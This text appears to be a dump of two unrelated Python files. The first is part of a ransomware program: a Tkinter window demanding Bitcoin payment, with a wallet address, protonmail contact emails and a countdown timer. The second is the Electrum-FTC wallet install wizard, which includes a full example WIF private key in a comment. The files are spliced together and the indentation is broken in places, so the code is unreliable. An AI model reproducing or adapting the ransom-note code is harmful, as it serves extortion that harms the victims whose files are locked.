YZGdn/eEl7ME0N5Gswp2t7m7vXMj
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'''
photo = PhotoImage(data=photo_code)
photo = photo.subsample(4)
label = Label(self, image=photo, background='black')
label.image = photo
label.grid(row=5, column=0, rowspan=2)
label = Label(self, image=photo, background='black')
label.image = photo
label.grid(row=5, column=3, rowspan=2)
message = f'''
YOUR FILES HAVE BEEN ENCRYPTED !
TO RECOVER YOUR FILES SEND US 10$ BITCOIN
AND SEND THE PAY CONFIRMATION WITH YOUR
TASK NUMBER TO : h3xv1ss1on@protonmail.com
BITCOIN : 1782x9AtVCQgv6GPjb9uHj1EoFhQocgEMs
TASK NUMBER : %s
Suki@Yosoevsky
'''%(self.special_key)
Label(self, text=message, wraplength=550, font='Helvetica 14 bold', foreground='white', background='red').grid(row=0, column=0, columnspan=4)
Label(self, text='', font='Helvetica 18 bold', foreground='red', background='black').grid(row=5, column=2)
Label(self, text='', font='Helvetica 18 bold', foreground='red', background='black').grid(row=6, column=2)
def start_thread():
thread = threading.Thread(target=start_timer)
thread.daemon = True
thread.start()
def start_timer():
Label(self, text='TIME LEFT:', font='Helvetica 18 bold', foreground='red', background='black').grid(row=5, column=0, columnspan=4)
try:
s = 3600
while s:
min, sec = divmod(s, 60)
time_left = '{:02d}:{:02d}'.format(min, sec)
Label(self, text=time_left, font='Helvetica 18 bold', foreground='red', background='black').grid(row=6, column=0, columnspan=4)
time.sleep(1)
s -= 1
if s == 1:
message = "Sorry :( Contact me in Yosoevsky@protonmail.com i ll help you"
Label(self, text=message, wraplength=1000, font='Helvetica 14 bold', foreground='white', background='black').grid(row=0, column=0, columnspan=4)
except KeyboardInterrupt:
pass
start_thread()
def a():
main = mainwindow("#0x00" + pass_gen(25, "without"))
main.mainloop()
def b():
for UI in range(100):
key = pass_gen(32, "with")
threading.Thread(target=a).start()
threading.Thread(target=b).start()
|
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum-FTC, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:N2gSYKAVixyW... \t-> 6rMCZCrSH...\n' +
'p2wpkh-p2sh:N2gSYKAVixyW... \t-> 3NhNeZQXF...\n' +
'p2wpkh:N2gSYKAVixyW... \t-> fc1q3fjfk...\n' + '\n' +
'IMPORTANT: WIF keys that have been exported with \n' +
'Electrum-FTC 3.1.3.1 or older must be imported without\n' +
'specifying the script type')
# note: full key is N2gSYKAVixyW8eMLqZ2S3dBww26TNcEbJQKPKMaYsECzJf2tR8xt
class CosignWidget(QWidget):
    """Round pie widget visualising an m-of-n multisig setup: m of the
    n wedges are painted green, the rest gray."""
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n

    def set_n(self, n):
        """Set the total number of cosigners and repaint."""
        self.n = n
        self.update()

    def set_m(self, m):
        """Set the number of required signatures and repaint."""
        self.m = m
        self.update()

    def paintEvent(self, event):
        # Qt angles are in 1/16ths of a degree.
        background = self.palette().color(QPalette.Background)
        painter = QPainter()
        painter.begin(self)
        painter.setPen(QPen(background, 7, Qt.SolidLine))
        painter.setRenderHint(QPainter.Antialiasing)
        painter.setBrush(Qt.gray)
        wedge_span = int(16* 360 * 1/self.n)
        for index in range(self.n):
            start = int(16* 360 * index/self.n)
            painter.setBrush(Qt.green if index < self.m else Qt.gray)
            painter.drawPie(self.R, start, wedge_span)
        painter.end()
def wizard_dialog(func):
    """Decorator for wizard page methods.

    Relabels the Back button, runs the page, and feeds its result into the
    ``run_next`` keyword callback.  GoBack navigates backwards (or closes the
    wizard when there is nothing to go back to); UserCancelled aborts the page
    silently.  Non-tuple results are wrapped so run_next is always splatted.
    """
    from functools import wraps

    @wraps(func)  # preserve the wrapped page's name/docstring for debugging
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
        except UserCancelled:
            return
        if type(out) is not tuple:
            out = (out,)
        run_next(*out)
    return func_wrapper
# NOTE(review): stale comment — no WindowModalDialog here; presumably MessageBoxMixin
# must precede BaseWizard so its show_error takes precedence (confirm before reordering)
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
    def __init__(self, config, app, plugins, storage):
        """Build the wizard dialog: wizard state, buttons, and scrollable layout.

        Args:
            config: configuration object (read here for 'language').
            app: the QApplication; needed by refresh_gui().
            plugins: plugin manager, forwarded to BaseWizard.
            storage: WalletStorage of the wallet being created/opened.
        """
        BaseWizard.__init__(self, config, plugins, storage)
        QDialog.__init__(self, None)
        self.setWindowTitle('Electrum-FTC - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        # Stored for the BaseWizard base class
        self.language_for_seed = config.get('language')
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Private event loop drives the wizard pages.  Exit codes:
        # 0 = dialog rejected/cancel, 1 = Back pressed, 2 = Next pressed
        # (see exec_layout and run_and_get_wallet).
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        # Wrap page content in a scroll area so small screens still work.
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon(':icons/electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui() # Need for QT on MacOSX. Lame.
    def run_and_get_wallet(self, get_wallet_from_daemon):
        """Show the wallet-file selection page and return an opened Wallet.

        Loops until the user picks a usable file: existing unencrypted files
        are opened, encrypted ones are decrypted (user password or hardware
        device), missing ones are created.  Wallets already open in the
        daemon are returned as-is.  Returns None if the user cancels.

        Args:
            get_wallet_from_daemon: callable(path) -> Wallet or None, used to
                detect wallets already loaded in memory.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(150)
        self.pw_e.setEchoMode(2)
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum-FTC wallet'))
        wallet_folder = os.path.dirname(self.storage.path)
        def on_choose():
            # File-picker callback for the 'Choose...' button.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)
        def on_filename(filename):
            # Re-evaluate self.storage and the info message whenever the
            # filename field changes; enables/disables the Next button.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.storage = wallet_from_memory.storage
                else:
                    self.storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                traceback.print_exc(file=sys.stderr)
                self.storage = None
                self.next_button.setEnabled(False)
            if self.storage:
                if not self.storage.file_exists():
                    msg =_("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                    pw = False
                elif not wallet_from_memory:
                    if self.storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        pw = True
                    elif self.storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                        pw = False
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                        pw = False
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                        + _("Press 'Next' to create/focus window.")
                    pw = False
            else:
                msg = _('Cannot read file')
                pw = False
            self.msg_label.setText(msg)
            # Only show the password field when a user password is required.
            if pw:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()
        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.storage.path)
        self.name_e.setText(n)
        # Loop until storage is usable: a new file, an unencrypted existing
        # file, or an encrypted file that was successfully decrypted.
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                return
            if self.storage.file_exists() and not self.storage.is_encrypted():
                break
            if not self.storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.storage.path)
            if wallet_from_memory:
                return wallet_from_memory
            if self.storage.file_exists() and self.storage.is_encrypted():
                if self.storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        # Wrong password: let the user try again.
                        QMessageBox.information(None, _('Error'), str(e))
                        continue
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                elif self.storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
                    except InvalidPassword as e:
                        QMessageBox.information(
                            None, _('Error'),
                            _('Failed to decrypt using this hardware device.') + '\n' +
                            _('If you use a passphrase, make sure it is correct.'))
                        # Restart the whole page with a fresh wizard stack.
                        self.stack = []
                        return self.run_and_get_wallet(get_wallet_from_daemon)
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                    if self.storage.is_past_initial_decryption():
                        break
                    else:
                        return
                else:
                    raise Exception('Unexpected encryption version')
        path = self.storage.path
        if self.storage.requires_split():
            # Pre-2.7 multi-account wallet: offer to split it into files.
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(self.storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return
        action = self.storage.get_action()
        if action and action not in ('new', 'upgrade_storage'):
            # Incomplete wallet creation found on disk: resume or delete it.
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
        if action:
            # self.wallet is set in run
            self.run(action)
            return self.wallet
        self.wallet = Wallet(self.storage)
        return self.wallet
def finished(self):
    """Hook called by the hardware client wrapper so it can close popups.

    The install wizard has nothing to clean up here, so this is a no-op.
    """
    return
def on_error(self, exc_info):
    """Report an exception to the user, unless it is a user cancellation."""
    exc = exc_info[1]
    if isinstance(exc, UserCancelled):
        return
    traceback.print_exception(*exc_info)
    self.show_error(str(exc))
def set_icon(self, filename):
    """Show *filename* as the wizard logo; return the previous icon path."""
    previous = self.icon_filename
    self.icon_filename = filename
    pixmap = QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation)
    self.logo.setPixmap(pixmap)
    return previous
def set_layout(self, layout, title=None, next_enabled=True):
    """Install *layout* as the wizard's main content, replacing any prior one."""
    if title:
        self.title.setText("<b>%s</b>" % title)
    else:
        self.title.setText("")
    self.title.setVisible(bool(title))
    # Reparent the old layout onto a throwaway widget: a QWidget refuses
    # setLayout() while it still owns a layout.
    old_layout = self.main_widget.layout()
    if old_layout:
        QWidget().setLayout(old_layout)
    self.main_widget.setLayout(layout)
    self.back_button.setEnabled(True)
    self.next_button.setEnabled(next_enabled)
    if next_enabled:
        self.next_button.setFocus()
    self.main_widget.setVisible(True)
    self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
# Show *layout*, block on the wizard's event loop until the user acts,
# then reset the chrome to the "please wait" state.
# Raises UserCancelled when the dialog was dismissed (result 0) and
# raise_on_cancel is set; raises GoBack when the user pressed Back
# (result 1).  Otherwise returns the event-loop result.
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
# Hide the interactive widgets until the next layout is installed.
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
    """Force the Qt event loop to repaint the wizard."""
    # Empirically a single processEvents() call is not enough to refresh.
    for _i in range(2):
        self.app.processEvents()
def remove_from_recently_open(self, filename):
# Drop *filename* from the config's list of recently opened wallets.
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
    """Run a KeysLayout dialog and return the text the user entered."""
    keys_layout = KeysLayout(parent=self, header_layout=message,
                             is_valid=is_valid, allow_multi=allow_multi)
    self.exec_layout(keys_layout, title, next_enabled=False)
    return keys_layout.get_text()
def seed_input(self, title, message, is_seed, options):
    """Run a SeedLayout dialog; return (seed, is_bip39, is_ext)."""
    seed_layout = SeedLayout(title=message, is_seed=is_seed,
                             options=options, parent=self)
    self.exec_layout(seed_layout, title, next_enabled=False)
    return seed_layout.get_seed(), seed_layout.is_bip39, seed_layout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
    """Prompt for a master key, optionally with a WIF help button."""
    header = QHBoxLayout()
    msg_label = WWLabel(message)
    msg_label.setMinimumWidth(400)
    header.addWidget(msg_label)
    if show_wif_help:
        header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    return self.text_input(title, header, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
    """Ask for cosigner number *index*'s master public (or private) key."""
    message = ' '.join([
        _('Please enter the master public key (xpub) of your cosigner.'),
        _('Enter their master private key (xprv) if you want to be able to sign for them.')
    ])
    return self.text_input(_("Add Cosigner") + " %d" % index, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
    """Collect a seed phrase for wallet restoration."""
    # Offer only the seed options this wizard run allows.
    options = []
    if self.opt_ext:
        options.append('ext')
    if self.opt_bip39:
        options.append('bip39')
    return self.seed_input(
        _('Enter Seed'),
        _('Please enter your seed phrase in order to restore your wallet.'),
        test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
    """Make the user retype the seed to prove they recorded it."""
    # Clear the clipboard so the seed cannot simply be pasted back.
    self.app.clipboard().clear()
    message = ' '.join([
        _('Your seed is important!'),
        _('If you lose your seed, your money will be permanently lost.'),
        _('To make sure that you have properly saved your seed, please retype it here.')
    ])
    seed, _is_bip39, _is_ext = self.seed_input(
        _('Confirm Seed'), message, test, None)
    return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
    """Display the freshly generated seed; return whether 'ext' was chosen."""
    seed_layout = SeedLayout(
        seed=seed_text,
        title=_("Your wallet generation seed is:"),
        msg=True,
        options=['ext'])
    self.exec_layout(seed_layout)
    return seed_layout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
    """Run a password-entry layout; return (new_password, encrypt_storage)."""
    playout = PasswordLayout(
